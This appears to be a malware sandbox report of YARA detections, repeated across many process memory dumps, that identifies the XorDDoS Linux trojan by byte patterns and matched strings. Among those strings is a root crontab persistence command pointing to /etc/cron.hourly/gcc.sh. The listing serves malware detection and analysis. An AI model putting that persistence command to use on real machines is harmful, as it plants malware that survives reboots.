6527.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6537.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6457.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6385.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6239.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6239.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6239.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6239.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6239.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6239.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6239.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6404.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6344.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6344.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6344.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6344.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6344.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6344.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6344.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6508.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6350.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6294.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6294.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6294.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6294.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6294.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6294.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6294.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6330.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6491.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6395.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6270.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6270.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6270.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6270.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6270.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6270.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6270.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x7953:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6275.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6275.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x8635b:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x863ad:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ac90:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ad89:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6275.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6aef9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6275.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x28f4:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x2977:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6275.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8e22:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8e8a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6275.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x266c:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
